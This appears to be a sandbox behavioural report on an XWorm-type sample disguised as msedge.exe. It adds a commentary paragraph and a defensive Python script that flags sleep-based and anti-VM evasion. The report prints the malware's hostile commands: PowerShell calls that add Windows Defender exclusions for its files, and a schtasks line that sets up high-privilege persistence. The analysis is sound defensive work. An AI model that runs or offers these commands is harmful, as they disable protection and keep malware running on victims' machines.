                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exe  Process information set: NOOPENFILEERRORBOX (42 identical entries)

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\msedge.exe :: WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (2 occurrences)
                    Source: C:\Users\user\Desktop\msedge.exe :: Memory allocated: CF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\msedge.exe :: Memory allocated: 1A8D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 1A6A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 23B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 1A570000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 2B70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 1AE00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Memory allocated: 1AFA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599766
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599655
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599547
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599435
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599251
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 599008
                    Source: C:\Users\user\Desktop\msedge.exe :: Thread delayed: delay time: 598906
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477 (4 occurrences)
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Thread delayed: delay time: 922337203685477 (4 occurrences)
                    Source: C:\Users\user\Desktop\msedge.exe :: Window / User API: threadDelayed 3339
                    Source: C:\Users\user\Desktop\msedge.exe :: Window / User API: threadDelayed 6505
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 5035
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 4806
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 5444
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 4121
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 7577
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 1931
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 7600
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 1987
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599655s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599435s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599251s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -599008s >= -30000s
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896 :: Thread sleep time: -598906s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6804 :: Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152 :: Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992 :: Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5128 :: Thread sleep count: 7600 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196 :: Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5128 :: Thread sleep count: 1987 > 30
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 404 :: Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 4252 :: Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 1036 :: Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\msedge.exe TID: 4980 :: Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed
                    Source: C:\Users\user\Desktop\msedge.exe :: File Volume queried: C:\ FullSizeInformation (15 occurrences)
                    Source: C:\Users\user\AppData\Local\msedge.exe :: File Volume queried: C:\ FullSizeInformation (4 occurrences)
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B699000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAWors"%SystemRoot%\system32\mswsock.dlliceModel, Version=4.
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B699000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAWw
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B699000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RA
                    Source: C:\Users\user\Desktop\msedge.exe :: Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\msedge.exe :: Process token adjusted: Debug (2 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process token adjusted: Debug (4 occurrences)
                    Source: C:\Users\user\AppData\Local\msedge.exe :: Process token adjusted: Debug (2 occurrences)
                    Source: C:\Users\user\Desktop\msedge.exe :: Memory allocated: page read and write | page guard
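Two details make the "Thread delayed" rows above readable. 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10,000), so every row carrying that value is a .NET wait with no practical upper bound; and the run 600000, 599875, 599766, ... on TID 6896 is consistent with a loop that wakes, recomputes the time left until a fixed deadline and sleeps again, i.e. one long wait delivered as many shorter calls. The Win32_VideoController query is the classic WMI probe for a hypervisor's display adapter. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that parses rows in the format shown above (a constructed subset of them is embedded), separates unbounded sleeps from finite ones, detects the countdown pattern and flags the WMI class as a VM-fingerprinting probe. The 30,000 ms per-sleep threshold mirrors the "-30000s" comparison in the rows; the set of WMI classes treated as VM probes is my own assumption.

```python
"""Triage of sandbox sleep / WMI evidence rows (added example; not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10_000): the value the
# report prints when a .NET sleep is effectively unbounded.
TIMESPAN_MAX_MS = 922_337_203_685_477
LONG_SLEEP_MS = 30_000  # per-sleep threshold the report rows compare against ("-30000s")
# WMI classes commonly queried to fingerprint a VM (assumption: illustrative list only).
VM_PROBE_CLASSES = {"Win32_VideoController", "Win32_ComputerSystem", "Win32_BIOS", "Win32_DiskDrive"}

# Rows look like "Source: <process> :: Thread delayed: delay time: <ms>"; the optional
# "::" separator also lets the regex accept rows where the two cells were run together.
DELAY_RE = re.compile(r"^Source:\s*(?P<proc>\S+?)\s*(?:::)?\s*Thread delayed: delay time: (?P<ms>\d+)")
WMI_RE = re.compile(r"^Source:\s*(?P<proc>\S+?)\s*(?:::)?\s*WMI Queries: .*?SELECT \* FROM (?P<cls>Win32_\w+)")


@dataclass
class ProcessSummary:
    infinite_sleeps: int = 0
    long_sleeps: int = 0
    finite_ms: int = 0
    delays: list = field(default_factory=list)   # finite delays, in row order
    wmi_classes: set = field(default_factory=set)

    def is_countdown(self, min_len=3):
        # A strictly decreasing run of delays is what a loop produces when it recomputes
        # "time left until the deadline" after every wake-up: one long wait in many pieces.
        d = self.delays
        return len(d) >= min_len and all(a > b for a, b in zip(d, d[1:]))


def summarize(rows):
    """Group rows per source process and bucket each sleep as unbounded / long / short."""
    out = {}
    for row in rows:
        m = DELAY_RE.match(row)
        if m:
            s = out.setdefault(m["proc"], ProcessSummary())
            ms = int(m["ms"])
            if ms >= TIMESPAN_MAX_MS:
                s.infinite_sleeps += 1
            else:
                s.finite_ms += ms
                s.delays.append(ms)
                if ms >= LONG_SLEEP_MS:
                    s.long_sleeps += 1
            continue
        m = WMI_RE.match(row)
        if m:
            out.setdefault(m["proc"], ProcessSummary()).wmi_classes.add(m["cls"])
    return out


def findings(summary):
    """One human-readable evasion indicator per process and indicator type."""
    hits = []
    for proc, s in summary.items():
        if s.infinite_sleeps:
            hits.append(f"{proc}: {s.infinite_sleeps} unbounded sleep(s) (TimeSpan.MaxValue)")
        if s.long_sleeps:
            hits.append(f"{proc}: {s.long_sleeps} sleep(s) >= {LONG_SLEEP_MS} ms, "
                        f"{s.finite_ms / 60000:.1f} min in total")
        if s.is_countdown():
            hits.append(f"{proc}: decreasing sleep countdown {s.delays[0]} -> {s.delays[-1]} ms")
        probes = s.wmi_classes & VM_PROBE_CLASSES
        if probes:
            hits.append(f"{proc}: VM-fingerprinting WMI query on {', '.join(sorted(probes))}")
    return hits


# Constructed input: a subset of the report rows above, in the same row format.
_DESKTOP = r"C:\Users\user\Desktop\msedge.exe"
_LOCAL = r"C:\Users\user\AppData\Local\msedge.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ROWS = (
    [f"Source: {_DESKTOP} :: WMI Queries: IWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_VideoController"] * 2
    + [f"Source: {_DESKTOP} :: Thread delayed: delay time: {ms}" for ms in
       (922337203685477, 600000, 599875, 599766, 599655, 599547, 599435, 599251, 599008, 598906)]
    + [f"Source: {_PS} :: Thread delayed: delay time: 922337203685477"] * 4
    + [f"Source: {_LOCAL} :: Thread delayed: delay time: 922337203685477"] * 4
)

if __name__ == "__main__":
    for line in findings(summarize(SAMPLE_ROWS)):
        print(line)
```

Run against the embedded rows, the Desktop copy of msedge.exe reports one unbounded sleep, nine long sleeps totalling about 90 minutes, a countdown from 600000 to 598906 ms and the video-controller probe, while the powershell.exe and AppData\Local instances only show unbounded sleeps; the rows whose sleep time the sandbox renders as a negative number are not parsed, since those values are the sandbox's own display and not durations.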

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\msedge.exe :: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe' (4 occurrences)
                    Source: C:\Users\user\Desktop\msedge.exe :: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe' (3 occurrences)
                    Source: C:\Users\user\Desktop\msedge.exe :: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' (2 occurrences)
                    Source: C:\Users\user\Desktop\msedge.exe :: Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Program Manager
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002A35000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Program Manager2
                    Source: C:\Users\user\Desktop\msedge.exe :: Queries volume information: C:\Users\user\Desktop\msedge.exe VolumeInformation
                    Source: C:\Users\user\Desktop\msedge.exe :: Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
